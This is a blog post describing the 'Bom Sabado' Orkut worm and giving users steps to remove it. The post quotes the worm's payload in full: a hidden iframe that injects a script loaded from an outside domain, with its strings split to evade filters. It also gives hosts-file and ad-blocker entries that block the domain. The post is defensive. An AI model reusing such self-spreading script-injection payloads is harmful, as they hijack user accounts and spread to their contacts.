Solution for Orkut worm Bom Sabado

9:17 PM Technology Enthusiast 0 Comments

Bom-Sabado-Orkut1 Today orkut users were flooded with scraps telling Bom Sabado!. Unlike other malware, this doesn't need you to click a link. Just by opening Orkut profile of the affected user, you will be affected. So I suggest you not to use orkut till this problm is fixed.

 

How it works?
When any one open page that is infected by this worm. A JavaScript will run automatically. Your browser will be hanged for some minutes on seconds. That script will automatically join you his communities. here you can see links of these communities.

After joining communities it will send scrap to your friends with text “Bom Sabado!” with a iFrame code which load that JavaScript again for your friends and they will join communities and send links to their friends.

With scrap “Bom Sabado!” it loads a small iFrame code.

Please find the find the Source of scrap below

<iframe style="display:none" onload="a = document.createElement( &#39;script&#39;);a.src = &#39;/&#39; + &#39;/tptools.o&#39;+&#39;rg/worm.js&#39;+&#39;#&lt;wbr&gt;#&#39;; document . body . appendChild( a )"></iframe>Bom Sabado!

It load JavaScript form ((..http..//tptools.org/worm.js – This site has been Suspended now)))…

Solution for now
Delete your cookies.
Change your password.

However, if you are already affected, you can get rid of this using the following steps. (This is applicable only for Firefox users. If you are using any other browser, see below):

Download AdBlock Plus add-on for Firefox and install it.
  • Restart the browser to enable AdBlock.
  • You will see a red icon with ABP on the right hand side of the search box in Firefox.

  • Click on that, and select Preferences.
  • Click Add Filter and enter *tptools.org/*.

Now you can safely open orkut.

You may have to remove yourself from the communities added by the worm, such as saadzin, meu miguxinho, O vírus que contagia, Eu tenho um grande AMOR, Juizo eu TENHO, só não USO!, Dino ♥ etc.

Note: The "Old Orkut" users are not affected by this worm, and are safe.
If you are not using Firefox, then you can follow the following steps:
Update: The website tptools.org is down now. Orkut is beautiful, again :-)

If you have a browser other than firefox, or to ensure that site won't get accessed by any other way, you can edit hosts file and adding the following lines:

127.0.0.1 tptools.org
127.0.0.1 www.tptools.org

hosts file is found in:

  • C:\Windows\ - Windows 95, 98, Me
  • C:\WinNT\system32\drivers\etc\ - Windows NT, 2000, XP Pro
  • C:\WINDOWS\System32\drivers\etc\ - Windows XP Home, Vista, 7
  • /etc/ - Linux

Lorem ipsum dolor sit amet, cotur acing elit. Ut euis eget dolor sit amet congue. Ut vira codo matis. Sed lacia luctus magna ut sodales lorem.

You Might Also Like

0 comments:

Subscribe to: Post Comments (Atom)